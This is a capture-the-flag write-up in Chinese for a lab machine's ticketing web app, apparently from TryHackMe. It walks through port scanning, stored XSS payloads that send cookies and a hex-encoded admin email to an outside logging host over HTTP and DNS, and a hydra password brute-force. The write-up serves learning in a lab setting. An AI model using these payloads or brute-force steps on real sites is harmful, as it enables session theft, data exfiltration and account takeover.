That's The Ticket
端口扫描
root@ip-10-10-29-11:~/thatstheticket# nmap -sTCV -p- --min-rate 1000 10.10.82.52
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-04 08:32 BST
Nmap scan report for thatstheticket.thm (10.10.82.52)
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bf:c3:9c:99:2c:c4:e2:d9:20:33:d1:3c:dc:01:48:d2 (RSA)
| 256 08:20:c2:73:c7:c5:d7:a7:ef:02:09:11:fc:85:a8:e2 (ECDSA)
|_ 256 1f:51:68:2b:5e:99:57:4c:b7:40:15:05:74:d0:0d:9b (EdDSA)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Ticket Manager > Home
MAC Address: 02:7B:71:0C:32:15 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds
80
访问 80 站点进行目录扫描以及搜索后无果, 我发现可以注册一个账号, 注册一个账号进行登录之后, 我发现其是创建 Ticket , 应该是利用 XSS 获取 Cookie 的操作, 所以我进行简单的搜索后发现产生 XSS 的方式
</textarea>
</div>
<script>alert('xss')</script>
利用题目给出的利用工具我在 10.10.10.100 创建了一个子域来进行监听, 并创建如下票据
</textarea>
<script>
fetch('http://0a60cac2492597aefd651605b8593157.log.tryhackme.tech/?cookie=' + document.cookie)
.then(response => response.text())
.then(data => {
console.log(data);
})
</script>
但是其发送的请求并没有我们的 Cookie (这里其实是我们的用户) 查看题目后意识到我们可能需要去获取管理员的邮箱
在这里我改进了我们的 XSS 转为获取邮箱, 同时在此有个特殊之处我们的服务端可能做了某些措施导致我们无法通过 HTTP 来获取我们的管理员邮箱, 但是可以通过 DNS 来获取
</textarea>
<script>
function stringToHex(str) {
var hexString = '';
for (var i = 0; i < str.length; i++) {
var hex = str.charCodeAt(i).toString(16);
hexString += hex;
}
return hexString;
}
fetch('http://' + stringToHex(document.getElementById('email').innerHTML) + '.e3d6772b2acb2799aeeb04350ceb5a68.log.tryhackme.tech')
.then(response => response.text())
.then(data => {
console.log(data);
})
</script>
获取到管理员的账号后我们使用其进行暴力破解
root@ip-10-10-29-11:~/thatstheticket# hydra -l [email protected] -P `locate rockyou.txt` thatstheticket.thm http-post-form "/login:email=^USER^&password=^PASS^:Invalid email"
......
[80][http-post-form] host: thatstheticket.thm login: [email protected] password: 123123
......
获取到密码之后进行登录即可
